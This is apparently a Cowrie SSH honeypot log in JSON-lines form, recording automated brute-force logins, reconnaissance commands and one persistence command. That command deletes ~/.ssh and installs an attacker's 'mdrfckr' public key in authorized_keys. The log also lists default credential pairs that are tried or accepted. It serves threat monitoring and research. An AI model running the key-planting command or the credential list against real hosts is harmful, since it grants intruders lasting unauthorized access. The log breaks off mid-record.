{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:42.797930Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:43.436886Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-08-26T04:18:43.437711Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":204,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:43.713934Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:44.289878Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-08-26T04:18:44.290586Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:44.569354Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:45.224397Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T04:18:45.225100Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:45.506378Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:46.082404Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-08-26T04:18:46.083117Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:46.622308Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:47.537694Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-08-26T04:18:47.538451Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:48.066310Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:49.112194Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-26T04:18:49.112962Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46630,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bed5e1a1c18","protocol":"ssh","message":"New connection: 212.227.235.229:46630 (1.2.3.4:22) [session: 2bed5e1a1c18]","sensor":"my-vps","timestamp":"2025-08-26T04:18:49.169471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:18:49.170465Z","src_ip":"212.227.235.229","session":"2bed5e1a1c18"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:18:49.457123Z","src_ip":"212.227.235.229","session":"2bed5e1a1c18"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.9","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:50.008492Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.login.failed","username":"mosprop","password":"123","message":"login attempt [mosprop/123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:18:50.648043Z","src_ip":"212.227.235.229","session":"2bed5e1a1c18"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:51.857240Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-26T04:18:51.857944Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:51.937044Z","src_ip":"212.227.235.229","session":"2bed5e1a1c18"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:53.490858Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:18:55.851390Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-08-26T04:18:55.852076Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"2.0","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:18:57.824310Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:19:05.062896Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-08-26T04:19:05.063919Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:19:06.826209Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.closed","duration":"72.9","message":"Connection lost after 72.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:19:06.827942Z","src_ip":"68.183.87.241","session":"3ebeadf05f6d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53902,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a3fed7f1ac0","protocol":"ssh","message":"New connection: 212.227.235.229:53902 (1.2.3.4:22) [session: 0a3fed7f1ac0]","sensor":"my-vps","timestamp":"2025-08-26T04:19:08.165749Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:19:08.166482Z","src_ip":"212.227.235.229","session":"0a3fed7f1ac0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:19:09.112450Z","src_ip":"212.227.235.229","session":"0a3fed7f1ac0"}
{"eventid":"cowrie.login.failed","username":"user","password":"123qwe123","message":"login attempt [user/123qwe123] failed","sensor":"my-vps","timestamp":"2025-08-26T04:19:12.772114Z","src_ip":"212.227.235.229","session":"0a3fed7f1ac0"}
{"eventid":"cowrie.session.closed","duration":"6.7","message":"Connection lost after 6.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:19:14.825124Z","src_ip":"212.227.235.229","session":"0a3fed7f1ac0"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":34206,"dst_ip":"1.2.3.4","dst_port":22,"session":"68196108406a","protocol":"ssh","message":"New connection: 103.217.145.104:34206 (1.2.3.4:22) [session: 68196108406a]","sensor":"my-vps","timestamp":"2025-08-26T04:19:22.926091Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:19:22.926827Z","src_ip":"103.217.145.104","session":"68196108406a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:19:23.196084Z","src_ip":"103.217.145.104","session":"68196108406a"}
{"eventid":"cowrie.login.success","username":"root","password":"root#123456","message":"login attempt [root/root#123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:19:24.314649Z","src_ip":"103.217.145.104","session":"68196108406a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:19:24.916886Z","src_ip":"103.217.145.104","session":"68196108406a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:19:24.917631Z","src_ip":"103.217.145.104","session":"68196108406a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:19:24.919114Z","src_ip":"103.217.145.104","session":"68196108406a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:19:25.189112Z","src_ip":"103.217.145.104","session":"68196108406a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:19:25.816581Z","src_ip":"103.217.145.104","session":"68196108406a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:19:25.817369Z","src_ip":"103.217.145.104","session":"68196108406a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:19:26.088781Z","src_ip":"103.217.145.104","session":"68196108406a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:19:26.089926Z","src_ip":"103.217.145.104","session":"68196108406a"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":34210,"dst_ip":"1.2.3.4","dst_port":22,"session":"63f21c3cbd92","protocol":"ssh","message":"New connection: 103.217.145.104:34210 (1.2.3.4:22) [session: 63f21c3cbd92]","sensor":"my-vps","timestamp":"2025-08-26T04:19:26.347858Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:19:26.349064Z","src_ip":"103.217.145.104","session":"63f21c3cbd92"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:19:26.612194Z","src_ip":"103.217.145.104","session":"63f21c3cbd92"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:19:27.695221Z","src_ip":"103.217.145.104","session":"63f21c3cbd92"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:19:28.962510Z","src_ip":"103.217.145.104","session":"63f21c3cbd92"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":34220,"dst_ip":"1.2.3.4","dst_port":22,"session":"84e406703003","protocol":"ssh","message":"New connection: 103.217.145.104:34220 (1.2.3.4:22) [session: 84e406703003]","sensor":"my-vps","timestamp":"2025-08-26T04:19:29.219307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:19:29.220503Z","src_ip":"103.217.145.104","session":"84e406703003"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:19:29.483884Z","src_ip":"103.217.145.104","session":"84e406703003"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:19:30.920246Z","src_ip":"103.217.145.104","session":"84e406703003"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:19:31.185960Z","src_ip":"103.217.145.104","session":"84e406703003"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:19:31.187509Z","src_ip":"103.217.145.104","session":"68196108406a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42064,"dst_ip":"1.2.3.4","dst_port":22,"session":"ead5e04ad47e","protocol":"ssh","message":"New connection: 212.227.235.229:42064 (1.2.3.4:22) [session: ead5e04ad47e]","sensor":"my-vps","timestamp":"2025-08-26T04:20:02.108154Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:20:02.108941Z","src_ip":"212.227.235.229","session":"ead5e04ad47e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-